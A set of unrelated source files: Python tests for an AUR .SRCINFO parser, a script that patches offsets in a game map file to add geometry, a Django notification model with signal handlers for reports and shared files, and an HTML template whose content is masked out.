            if isinstance(val, list):
                val.sort()
                if isinstance(res[key], list):
                    res[key].sort()
            self.assertEqual(val, res[key],
                             "expected: {}. current: {}".format(val, res[key]))

    def test_map_srcinfo__only_one_pkgname(self):
        expected_fields = {
            'pkgbase': 'bauh',
            'pkgname': 'bauh',
            'pkgver': '0.9.6',
            'pkgrel': '2',
            'url': 'https://github.com/vinifmor/bauh',
            'arch': 'any',
            'license': 'zlib/libpng',
            'makedepends': ['git', 'python', 'python-pip', 'python-setuptools'],
            'depends': [
                'python', 'python-colorama', 'python-pyaml', 'python-pyqt5', 'python-pyqt5-sip', 'python-requests', 'qt5-svg'
            ],
            'optdepends': [
                'flatpak: required for Flatpak support',
                'python-beautifulsoup4: for Native Web applications support',
                'python-lxml: for Native Web applications support',
                'snapd: required for Snap support'
            ],
            'source': ['https://github.com/vinifmor/bauh/archive/0.9.6.tar.gz'],
            'sha512sums': ['cb1820b8a41dccec746d91d71b7f524c2e3caf6b30b0cd9666598b8ad49302654d9ce9bd1a0a2a9612afebc27ef78a2a94ac10e4e6c183742effe4feeabaa7b2']
        }
        res = aur.map_srcinfo(self._read_srcinfo('bauh_srcinfo'), 'bauh')
        # The original test did not constrain the total number of keys here.
        self._assert_fields(res, expected_fields, check_len=False)

    def test_map_srcinfo__one_name__only_specific_fields(self):
        expected_fields = {
            'pkgver': '0.9.6',
            'pkgrel': '2'
        }
        res = aur.map_srcinfo(self._read_srcinfo('bauh_srcinfo'), 'bauh',
                              fields={*expected_fields.keys()})
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_pkgnames__pkgname_specified_case_1(self):
        expected_fields = {
            'pkgbase': 'mangohud',
            'pkgname': 'mangohud',
            'pkgver': '0.5.1',
            'pkgrel': '3',
            'pkgdesc': 'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more',
            'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
            'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
            'license': 'MIT',
            'arch': 'x86_64',
            'url': 'https://github.com/flightlessmango/MangoHud',
            'makedepends': [
                'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
                'lib32-vulkan-icd-loader', 'libxnvctrl'
            ],
            'depends': ['gcc-libs', 'mangohud-common'],
            'optdepends': ['bash: mangohud helper script', 'libxnvctrl: support for older NVIDIA GPUs']
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'mangohud')
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_pkgnames__pkgname_specified_case_2(self):
        expected_fields = {
            'pkgbase': 'mangohud',
            'pkgname': 'mangohud-common',
            'pkgver': '0.5.1',
            'pkgrel': '3',
            'pkgdesc': 'Common files for mangohud and lib32-mangohud',
            'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
            'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
            'license': 'MIT',
            'url': 'https://github.com/flightlessmango/MangoHud',
            'arch': 'x86_64',
            'makedepends': [
                'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
                'lib32-vulkan-icd-loader', 'libxnvctrl'
            ],
            'optdepends': ['bash: mangohud helper script']
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'mangohud-common')
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_pkgnames__pkgname_specified_case_3(self):
        expected_fields = {
            'pkgbase': 'mangohud',
            'pkgname': 'lib32-mangohud',
            'pkgver': '0.5.1',
            'pkgrel': '3',
            'pkgdesc': 'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more (32-bit)',
            'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
            'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
            'license': 'MIT',
            'url': 'https://github.com/flightlessmango/MangoHud',
            'arch': 'x86_64',
            'makedepends': [
                'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
                'lib32-vulkan-icd-loader', 'libxnvctrl'
            ],
            'depends': ['mangohud', 'mangohud-common', 'lib32-gcc-libs'],
            'optdepends': ['lib32-libxnvctrl: support for older NVIDIA GPUs']
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'lib32-mangohud')
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_pkgnames__different_pkgname(self):
        # When the requested pkgname is not in the file, fields from all
        # packages are merged.
        expected_fields = {
            'pkgbase': 'mangohud',
            'pkgname': ['lib32-mangohud', 'mangohud', 'mangohud-common'],
            'pkgver': '0.5.1',
            'pkgrel': '3',
            'pkgdesc': [
                'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more (32-bit)',
                'Common files for mangohud and lib32-mangohud',
                'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more',
            ],
            'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
            'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
            'license': 'MIT',
            'url': 'https://github.com/flightlessmango/MangoHud',
            'arch': 'x86_64',
            'makedepends': [
                'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
                'lib32-vulkan-icd-loader', 'libxnvctrl'
            ],
            'depends': ['mangohud', 'mangohud-common', 'lib32-gcc-libs', 'gcc-libs'],
            'optdepends': ['lib32-libxnvctrl: support for older NVIDIA GPUs',
                           'bash: mangohud helper script',
                           'libxnvctrl: support for older NVIDIA GPUs']
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'xpto')
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_names__pkgname_present__only_specific_fields(self):
        expected_fields = {
            'pkgver': '0.5.1',
            'pkgrel': '3'
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'mangohud-commons',
                              fields={*expected_fields.keys()})
        self._assert_fields(res, expected_fields)

    def test_map_srcinfo__several_names__pkgname_not_present__only_specific_fields(self):
        expected_fields = {
            'pkgname': ['mangohud', 'lib32-mangohud', 'mangohud-common'],
            'pkgver': '0.5.1'
        }
        res = aur.map_srcinfo(self._read_srcinfo('mangohud_srcinfo'), 'xpto',
                              fields={*expected_fields.keys()})
        self._assert_fields(res, expected_fields)
|
<filename>legacy/map_helper.py
import struct
# DEBUG VARS -- hand-tuned for one specific edit of one specific map file.
map_name = 'ca20.map.auto'  # map file to patch, resolved relative to the CWD
OBJECT_IND = 0   # index (into the filtered offset list) of the object to patch
PRIM_IND = 1     # index of the primitive group receiving the new geometry
VB_INDEX = 0     # index of the vertex buffer receiving the new vertices
VERTS_ADDED = 6  # number of vertices injected (shifts later vert ranges)
VERT_LEN = 0xC0  # byte length of the injected vertex data (added to sizes/offsets)
ORIG_IB_LEN = 0x159C8  # original index-buffer byte length
NEW_IB_LEN = 0x159DA   # index-buffer byte length after injection
IB_DIF = NEW_IB_LEN - ORIG_IB_LEN  # index-buffer growth in bytes
INDEXES_ADDED = IB_DIF // 2  # indexes appear to be 16-bit, two bytes each
def main():
    """Patch the configured object inside the hard-coded map file in place."""
    with open(map_name, 'rb+') as map_file:
        offsets = get_object_offsets(map_file)
        update_object(map_file, offsets[OBJECT_IND])
def get_object_offsets(f):
    """Walk the map-file header, grow every section length that must absorb
    the injected vertex/index bytes, and collect object start offsets.

    :param f: the map file opened 'rb+'; the cursor is advanced and several
              32-bit little-endian length fields are rewritten in place.
    :return: start offsets of a hand-picked subset of the objects
             (table indices 0, 1 and 3).
    """
    object_offsets = []
    f.read(4)
    map_len = f.read(0x4)
    map_len = struct.unpack('<I', map_len)[0]
    print(f'MAP LEN:\t\t0x{map_len:X}')
    # Grow the total map length by the bytes about to be injected, then
    # rewrite the field in place (seek back over the 4 bytes just read).
    map_len += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', map_len))
    #UPDATE VALUE HERE
    f.read(0xC) #ignore irrelevant data for now
    tex_section_len = f.read(4)
    tex_section_len = struct.unpack('<I', tex_section_len)[0]
    f.read(8)
    # Skip over the texture section entirely; nothing in it changes.
    f.seek(tex_section_len, 1)
    f.read(4)
    section_len = f.read(4)
    section_len = struct.unpack('<I', section_len)[0]
    print(f'SECTION LEN:\t\t0x{section_len:X}')
    section_len += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', section_len))
    #UPDATE VALUE HERE
    f.read(0xC) # discard geom section header and creation date
    object_count = f.read(4)
    object_count = struct.unpack('<I', object_count)[0]
    sub_section_len = f.read(4)
    sub_section_len = struct.unpack('<I', sub_section_len)[0]
    print(f'SUBSECTION LEN:\t0x{sub_section_len:X}')
    sub_section_len += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', sub_section_len))
    #UPDATE VALUE HERE
    f.read(4)
    # Walk the object table: remember each object's start, then hop to the
    # next one using its stored length.
    while(object_count > 0):
        object_start = f.tell()
        f.read(4)
        object_len = f.read(4)
        object_len = struct.unpack('<I', object_len)[0]
        object_offsets.append(object_start)
        f.seek(object_start + object_len)
        object_count -= 1
    #return objOffsetList
    # NOTE(review): only objects 0, 1 and 3 are returned -- presumably the
    # ones relevant to this particular map; raises IndexError if the map has
    # fewer than four objects. Confirm before reusing on other maps.
    return [object_offsets[0], object_offsets[1], object_offsets[3]]
def update_object(f, off):
    """Rewrite, in place, every length/offset inside one object that must
    grow by VERT_LEN (injected vertex bytes) and/or IB_DIF (injected
    index-buffer bytes), then fix up primitive ranges and vertex buffers.

    :param f: the map file opened 'rb+'
    :param off: absolute offset of the object (from get_object_offsets)
    """
    vb_offsets = []  # NOTE(review): never populated or used -- dead variable?
    f.seek(off)
    f.read(4)
    object_len = f.read(4)
    object_len = struct.unpack('<I', object_len)[0]
    print(f'OBJECT LEN:\t\t0x{object_len:X}')
    object_len += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', object_len))
    # UPDATE VALUE HERE
    f.read(4)
    unk_len_0 = f.read(4)
    unk_len_0 = struct.unpack('<I', unk_len_0)[0]
    print(f'UNK0 LEN:\t\t0x{unk_len_0:X}')
    if(unk_len_0 != 0): # Only non-zero in streamed maps
        unk_len_0 += VERT_LEN + IB_DIF
        f.seek(-4, 1)
        f.write(struct.pack('<I', unk_len_0))
        # UPDATE VALUE HERE
    unk_len_1 = f.read(4)
    unk_len_1 = struct.unpack('<I', unk_len_1)[0]
    print(f'UNK1 len:\t\t0x{unk_len_1:X}')
    unk_len_1 += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', unk_len_1))
    # UPDATE VALUE HERE
    f.read(4)
    bounding_volume_len = f.read(4)
    bounding_volume_len = struct.unpack('<I', bounding_volume_len)[0]
    f.read(bounding_volume_len * 4) # ignore occlusion culling volume
    f.read(4) # ignore whatever this is
    index_buf_ptr = f.read(4)
    index_buf_ptr = struct.unpack('<I', index_buf_ptr)[0]
    print(f'INDEX BUF POINTER:\t0x{index_buf_ptr:X}')
    # The index buffer sits after the vertex data, so its pointer shifts by
    # the injected vertex bytes only.
    index_buf_ptr += VERT_LEN
    f.seek(-4, 1)
    f.write(struct.pack('<I', index_buf_ptr))
    # UPDATE VALUE HERE
    index_buf_len = f.read(4)
    index_buf_len = struct.unpack('<I', index_buf_len)[0]
    print(f'INDEX BUF LEN:\t\t0x{index_buf_len:X}')
    index_buf_len += IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', index_buf_len))
    # UPDATE VALUE HERE
    unk_len_2 = f.read(4)
    unk_len_2 = struct.unpack('<I', unk_len_2)[0]
    print(f'UNK2 LEN:\t\t0x{unk_len_2:X}')
    unk_len_2 += VERT_LEN + IB_DIF
    f.seek(-4, 1)
    f.write(struct.pack('<I', unk_len_2))
    #UPDATE VALUE HERE
    # Fix up per-primitive counts and vertex ranges before the VB records.
    primitive_list = get_primitives(f)
    unk_len_3 = f.read(4)
    unk_len_3 = struct.unpack('<I', unk_len_3)[0]
    print(f'UNK3 LEN:\t\t0x{unk_len_3:X}')
    unk_len_3 += VERT_LEN
    f.seek(-4, 1)
    f.write(struct.pack('<I', unk_len_3))
    #UPDATE VALUE HERE
    vb_count = f.read(4)
    vb_count = struct.unpack('<I', vb_count)[0]
    vb_info_list = []
    for vb in range(0, vb_count):
        if(vb >= VB_INDEX): # SHOULD REALLY GET THE VB INDEX PROGRAMATICALLY
            vb_start = f.read(4)
            vb_start = struct.unpack('<I', vb_start)[0]
            print(f'VERTBUF START:\t\t0x{vb_start:X}')
            # Buffers after the patched one shift by the injected bytes.
            if(vb > VB_INDEX):
                vb_start += VERT_LEN
                f.seek(-4,1)
                f.write(struct.pack('<I', vb_start))
                #UPDATE VALUE HERE (NOT NECESSARY FOR HP190)
            f.read(4) #discard stride
            vb_len = f.read(4)
            vb_len = struct.unpack('<I', vb_len)[0]
            print(f'VERTBUF LEN:\t\t0x{vb_len:X}')
            vb_len += VERT_LEN
            f.seek(-4,1)
            f.write(struct.pack('<I', vb_len))
            #UPDATE VALUE HERE
        else:
            f.read(12) # skip vertex buffer
def get_primitives(f):
    """Patch the primitive table in place: grow the primitive count of the
    target group (PRIM_IND) and shift the vertex ranges of that group and
    every group after it by VERTS_ADDED.

    :param f: the map file opened 'rb+', positioned at the primitive table
    :return: an empty list -- nothing is ever appended to ``primitives``.
             NOTE(review): presumably a leftover; the caller ignores the
             return value, so this is effectively a side-effect-only pass.
    """
    print()
    object_count = f.read(4)
    object_count = struct.unpack('<I', object_count)[0]
    primitives = []
    for o in range(0, object_count):
        if(o >= PRIM_IND):
            f.read(0xC)
            primitive_count = f.read(2)
            primitive_count = struct.unpack('<H', primitive_count)[0]
            print(f'P{o} PRIM COUNT:\t\t0x{primitive_count:X}')
            # Only the target group gains new indexes.
            if(o == PRIM_IND):
                primitive_count += INDEXES_ADDED
                f.seek(-2,1)
                f.write(struct.pack('<H', primitive_count))
                #UPDATE VALUE HERE
            f.read(2)
            vert_start = f.read(2)
            vert_start = struct.unpack('<H', vert_start)[0]
            print(f'P{o} VERT START:\t\t0x{vert_start:X}')
            # Groups after the target start later because of the new verts.
            if(o > PRIM_IND):
                vert_start += VERTS_ADDED
                f.seek(-2,1)
                f.write(struct.pack('<H', vert_start))
                #UPDATE VALUE HERE
            vert_end = f.read(2)
            vert_end = struct.unpack('<H', vert_end)[0]
            print(f'P{o} VERT END:\t\t0x{vert_end:X}')
            # The end of the target group and of every later group shifts.
            vert_end += VERTS_ADDED
            f.seek(-2,1)
            f.write(struct.pack('<H', vert_end))
            #UPDATE VALUE HERE
        else:
            f.read(0x14) # Not interested, skip
    return primitives
# Script entry point: patch the map file named in the DEBUG VARS above.
if __name__ == '__main__':
    main()
|
<gh_stars>1-10
from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from multiselectfield import MultiSelectField
from django_countries.fields import CountryField
from apps.profiles.models import UserType, UserCreatedGroup, UserProfile
from crum import get_current_user
from django.db.models.signals import post_save, m2m_changed
from datetime import datetime, timedelta
from apps.reports.models import Report, OnlineReport
from apps.filesharing.models import SharedFile, SharedFolder
from apps.events.models import Event
class Notification(models.Model):
    """A notification targeted at users by occupational group, country,
    organization, or directly.

    The notified object is referenced generically (content_type/object_id),
    so reports, shared files/folders, groups and events can all be subjects.
    """
    # Profile of the user whose action triggered the notification.
    creator = models.ForeignKey('profiles.UserProfile', blank=True, null=True, related_name="notifications_created", on_delete=models.CASCADE)
    # Generic FK to the object the notification is about.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')
    # Targeting dimensions; an empty dimension means "no restriction"
    # (see user_can_view).
    recipient_occupational_groups = MultiSelectField(choices=UserType.choices, max_length=4*len(UserType.choices))
    recipient_countries = CountryField(multiple=True, blank=True, default='')
    recipient_users = models.ManyToManyField('profiles.UserProfile', blank=True, related_name="notifications_received")
    recipient_orgs = models.ManyToManyField('profiles.OrganizationGroup', blank=True, related_name="notifications_received")
    # Users who have already seen this notification.
    viewed_by = models.ManyToManyField('profiles.UserProfile', blank=True, related_name="notifications_viewed")
    timestamp = models.DateTimeField(default=datetime.now)

    def save(self, *args, **kwargs):
        """Stamp the creator from the current request user (via crum) and
        refresh the timestamp, then delegate to the normal model save."""
        current_user = get_current_user()
        if current_user.is_authenticated:
            self.creator = get_current_user().profile
        # NOTE(review): reconstructed nesting -- confirm the timestamp
        # refresh is intended for anonymous saves as well.
        self.timestamp = datetime.now()
        super(Notification, self).save(*args, **kwargs)

    def register_viewer(self):
        """Mark this notification as viewed by the current request user."""
        current_user = get_current_user()
        current_user_profile = current_user.profile
        self.viewed_by.add(current_user_profile)

    def unregister_viewer(self):
        """Remove the current request user from the viewed_by set."""
        current_user = get_current_user()
        current_user_profile = current_user.profile
        self.viewed_by.remove(current_user_profile)

    def user_can_view(self):
        """Return True when the current request user matches every
        targeting dimension (each empty dimension matches everyone)."""
        current_user = get_current_user()
        current_user_profile = current_user.profile
        current_user_country = current_user_profile.country
        current_user_org = current_user.primary_org
        current_user_type = current_user_profile.type
        # NOTE(review): `== ""` compares multi-value fields against the empty
        # string -- confirm that is how empty CountryField/MultiSelectField
        # values are represented here.
        return (current_user_profile in self.recipient_users or not self.recipient_users.exists())\
            and (current_user_country in self.recipient_countries or self.recipient_countries == "")\
            and (current_user_org in self.recipient_orgs or not self.recipient_orgs.exists())\
            and (current_user_type in self.recipient_occupational_groups or self.recipient_occupational_groups == "")

    def __str__(self):
        """Human-readable summary, specialized per notified object type;
        falls back to a generic message when the object was deleted."""
        if self.content_type == ContentType.objects.get_for_model(Report):
            if self.content_object:
                return "New report: {} activity in {}".format(self.content_object.get_category_display(), self.content_object.country.name)
            else:
                return "New report: (report was deleted - no longer accessible)"
        elif self.content_type == ContentType.objects.get_for_model(OnlineReport):
            if self.content_object:
                return "New online activity report: {}".format(self.content_object.get_category_display())
            else:
                return "New online report: (online report was deleted - no longer accessible)"
        elif self.content_type == ContentType.objects.get_for_model(SharedFile):
            if self.content_object:
                return "A file was shared with you: {}".format(self.content_object.file.name.split('/')[-1])
            else:
                return "A file was shared with you: {}".format("(deleted by now - no longer accessible)")
        elif self.content_type == ContentType.objects.get_for_model(SharedFolder):
            if self.content_object:
                return "A folder was shared with you: {}".format(self.content_object.name)
            else:
                return "A folder was shared with you: {}".format("(deleted by now - no longer accessible)")
        elif self.content_type == ContentType.objects.get_for_model(UserCreatedGroup):
            if self.content_object:
                return "A change in status in the group {}".format(self.content_object.display_name)
            else:
                return "A change in status in the group {}".format("(deleted by now - no longer accessible)")
        elif self.content_type == ContentType.objects.get_for_model(Event):
            if self.content_object:
                return "Invitation to event \"{}\" on {}".format(self.content_object.title, self.content_object.datetime_start)
            else:
                return "A change in status in the event {}".format("(deleted by now - no longer accessible)")
        else:
            return "New {}".format(self.content_type.model)
def generate_report_notification(sender, instance, **kwargs):
    """post_save handler: broadcast a notification when a report is finalized.

    Fires only on updates of read_only (finalized) reports, never on creation.
    """
    if kwargs['created'] or not instance.read_only:
        return
    # Country targeting applies only to (offline) Report instances.
    countries = instance.country if sender is Report else ''
    groups = (UserType.JRN.value, UserType.ACA.value, UserType.NGO.value,
              UserType.LAW.value, UserType.GOV.value, UserType.IGO.value)
    new_notification = Notification(
        content_type=ContentType.objects.get_for_model(sender),
        object_id=instance.id,
        recipient_countries=countries,
        recipient_occupational_groups=groups)
    new_notification.save()
def generate_file_or_folder_notification(sender, instance, **kwargs):
    """post_save handler: notify share targets when a file/folder is shared.

    To avoid spamming, a notification for the same object created by the
    same user within the last 15 minutes is refreshed (timestamp and
    recipients re-set) instead of creating a duplicate.
    """
    content_type = ContentType.objects.get_for_model(sender)
    object_id = instance.id
    recipient_users = instance.users_read.all() | instance.users_write.all()
    recipient_orgs = instance.orgs_read.all() | instance.orgs_write.all()
    current_user_profile = get_current_user().profile
    if not recipient_users and not recipient_orgs:
        # No recipients at all: do not generate a notification.
        return
    fifteen_mins_ago = datetime.now() - timedelta(minutes=15)
    potential_duplicate = None
    # The SharedFile and SharedFolder branches ran identical queries, so
    # they are merged into one lookup.
    if sender in (SharedFile, SharedFolder):
        potential_duplicate = Notification.objects.filter(
            object_id=object_id,
            content_type=content_type,
            timestamp__gte=fifteen_mins_ago,
            creator=current_user_profile).first()
    if not potential_duplicate:
        new_notification = Notification(content_type=content_type, object_id=object_id)
        new_notification.save()
        new_notification.recipient_users.set(recipient_users)
        new_notification.recipient_orgs.set(recipient_orgs)
    else:
        potential_duplicate.timestamp = datetime.now()
        potential_duplicate.recipient_users.set(recipient_users)
        potential_duplicate.recipient_orgs.set(recipient_orgs)
        potential_duplicate.save()
def notify_new_share_targets_of_file_or_folder(sender, instance, **kwargs):
    """m2m_changed receiver: notify users/orgs newly added to a file/folder share.

    Handles only the "post_add" action. As in
    generate_file_or_folder_notification, a notification created by the same
    user for the same object within the last 15 minutes is reused (the new
    recipients are added to it) instead of creating a new one.

    Args:
        sender: one of the eight through models of SharedFile/SharedFolder
            users_read/users_write/orgs_read/orgs_write M2M fields.
        instance: the SharedFile/SharedFolder whose share list changed.
        **kwargs: m2m_changed keyword arguments; 'action' and 'pk_set' are used.
    """
    # Debug print removed: signal receivers should not write to stdout.
    if kwargs['action'] != "post_add":
        return
    pk_set = kwargs['pk_set']
    # NOTE(review): assumes get_current_user() returns a user with a .profile
    # — confirm for anonymous/system-initiated changes.
    current_user_profile = get_current_user().profile
    object_id = instance.id
    # Classify the through-model sender once so the four near-identical
    # branches of the original (file/folder x users/orgs) collapse into a
    # single code path keyed on (content type, recipient field).
    file_user_senders = (SharedFile.users_read.through, SharedFile.users_write.through)
    file_org_senders = (SharedFile.orgs_read.through, SharedFile.orgs_write.through)
    folder_user_senders = (SharedFolder.users_read.through, SharedFolder.users_write.through)
    folder_org_senders = (SharedFolder.orgs_read.through, SharedFolder.orgs_write.through)
    if sender in file_user_senders or sender in file_org_senders:
        content_type = ContentType.objects.get_for_model(SharedFile)
    elif sender in folder_user_senders or sender in folder_org_senders:
        content_type = ContentType.objects.get_for_model(SharedFolder)
    else:
        return  # not a share-related m2m change; nothing to notify
    targets_users = sender in file_user_senders or sender in folder_user_senders
    fifteen_mins_ago = datetime.now() - timedelta(minutes=15)
    potential_duplicate = Notification.objects.filter(
        object_id=object_id, content_type=content_type,
        timestamp__gte=fifteen_mins_ago, creator=current_user_profile).first()
    if potential_duplicate:
        # Fold the new recipients into the recent notification and bump it.
        target_field = (potential_duplicate.recipient_users if targets_users
                        else potential_duplicate.recipient_orgs)
        target_field.add(*pk_set)
        potential_duplicate.timestamp = datetime.now()
        potential_duplicate.save()
    else:
        new_notification = Notification(content_type=content_type, object_id=object_id)
        # Save first: the instance needs a primary key before M2M assignment.
        new_notification.save()
        target_field = (new_notification.recipient_users if targets_users
                        else new_notification.recipient_orgs)
        target_field.set(pk_set)
# Wire the notification receivers to their model signals. The shared
# dispatch_uid keeps Django from registering the same (receiver, sender)
# pair twice on repeated module imports; uniqueness is per sender, so one
# uid is sufficient for all registrations.
_DISPATCH_UID = "apps.notifications.models"

for _report_model in (Report, OnlineReport):
    post_save.connect(generate_report_notification,
                      sender=_report_model, dispatch_uid=_DISPATCH_UID)

for _shared_model in (SharedFile, SharedFolder):
    post_save.connect(generate_file_or_folder_notification,
                      sender=_shared_model, dispatch_uid=_DISPATCH_UID)

# Every M2M share-target field on files and folders triggers the
# "new share targets" notification.
for _through_model in (SharedFile.users_read.through,
                       SharedFile.users_write.through,
                       SharedFile.orgs_read.through,
                       SharedFile.orgs_write.through,
                       SharedFolder.users_read.through,
                       SharedFolder.users_write.through,
                       SharedFolder.orgs_read.through,
                       SharedFolder.orgs_write.through):
    m2m_changed.connect(notify_new_share_targets_of_file_or_folder,
                        sender=_through_model, dispatch_uid=_DISPATCH_UID)
|
<reponame>hmabubakar313/admin_panel_theme
XXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXX
XXXXXXXXXXX
XXXXXXXXXX
XXXXXXXXX
XXXXXXXX
XXXXXXXX
XXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
